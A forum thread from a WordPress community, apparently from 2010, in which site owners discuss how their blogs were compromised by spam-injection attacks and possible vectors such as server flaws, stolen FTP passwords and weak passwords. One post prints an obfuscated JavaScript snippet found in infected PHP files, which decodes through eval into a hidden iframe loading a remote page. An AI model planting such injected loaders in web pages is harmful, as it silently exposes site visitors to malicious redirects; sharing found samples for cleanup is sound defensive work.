LinkBack URL
About LinkBacksDo those directories actually exist? Try 'ls' command inside those folders? If yes, what's inside them?Originally Posted by jakebarnes
Hello World
Do those directories actually exist? Try 'ls' command inside those folders? If yes, what's inside them?
WPTavern Forum Admin
Variations of the spam injection link attacks have been ongoing for a long time. I have yet to be hit by them. If indeed this was a vector introduced by WordPress, why are more sites not being effected on a grand scale?
I understand that until you know it's not WordPress or it's WordPress, there is not much you can do.
On The Rocks
No, it was not a security release.
http://wordpress.org/development/201...rdpress-2-9-2/
To the best of my knowledge, there is no "new attack" going round.
My point is that it is still unlikely that they are getting into your systems via a security problem in WordPress. 99% of all "hacks" are done through other means. WordPress can, and often is, targeted even without having some kind of hole in it. All they need is to get a piece of code to run on your system and it can "auto-hack" all your WordPress sites from behind.
In other words, the attack vector doesn't have to be WordPress just because your WordPress sites have the malicious code in them. Until you know how that code gets there, you don't know what the attack vector is. Seriously, we've seen hacks that are basically Windows viruses which steal FTP passwords and then will hack WordPress installations through there... WP is a big fat juicy target.
Hello World
Good question! I looked in a few and they were empty. I should have looked in them all.
Anyway, I've deleted them all, but I worry that the attacker could crack in the same way they got in last time, which, as yet, I am unsure of.
Hello World
Understood. I realize the attack may not involve a security flaw in WordPress itself. If the attack involves a weakness in our server setup, I'd be curious to learn what the attack is.
By the way, FTP is not installed on this server. We only allow SFTP connections, which should make it much more difficult for anyone to steal username/passwords.
Big Tipper
SFTP theoretically makes it harder to steal usernames/passwords but it doesn't do anything to stop hackers from guessing an insecure password.
Hello World
Thanks, Will. I think we are on safe ground there. I suspect the attacker did not get in via a guessed password.
WPTavern Forum Admin
Ok well, does anyone have any further updates regarding what happened?
Here For The Peanuts
Just found this thread...
I also cleaned and restored three blogs last week that have been compromised, spam injected code was added to redirect the site. The files infected were WordPress wp-config.php file, the theme files for the activated theme, and plugin files, and all WordPress core files. The only files that were affected were PHP files.
Two sites were at 123-reg.co.uk.
I restored everything and checked every file on these sites for bad code, checked the database and then recommended all passwords should be changed for WordPress and the hosting accounts.
If the sites happen to get hacked again then it's no doubt a server flaw or loophole.
A lot of hosts nowadays don't keep server software and packages up to date, most a far out of date because it would take a whole lot of time to update a whole server farm etc.
The below code is what was in every PHP file through out one site:
Another site had a script which would take up about 10 posts on this forum....<script>var VkXmR6='d$!#o$!#c$!#u$!#m$!#e$!#n$!#t$!#.$!#w$!#r$ !#i$!#t$!#e$!#($!#\'$!#<$!#i$!#f$!#r$!#a$!#m$!#e$! # $!#s$!#r$!#c$!#=$!#"$!#h$!#t$!#t$!#p$!#:$!#/$!#/$!#g$!#e$!#o$!#n$!#o$!#n$!#.$!#n$!#e$!#t$!#/$!#i$!#n$!#.$!#p$!#h$!#p$!#"$!# $!#w$!#i$!#d$!#t$!#h$!#=$!#1$!# $!#h$!#e$!#i$!#g$!#h$!#t$!#=$!#1$!# $!#f$!#r$!#a$!#m$!#e$!#b$!#o$!#r$!#d$!#e$!#r$!#=$! #0$!#>$!#<$!#/$!#i$!#f$!#r$!#a$!#m$!#e$!#>$!#\'$!#)$!#;$!#';eval (VkXmR6.split('$!#').join(""));</script>
Last edited by Martin; 03-29-2010 at 01:59 AM.
Premium WordPress Hosting - Zero Click WordPress Installation on Hosting Signups!
WPTavern Forum Admin
Hmm, how in the world does code get injected into wp-config.php since that file is supposed to be locked down to the point where even the owner of the file only has viewing permissions but not writable.
Posting Permissions
Reply With Quote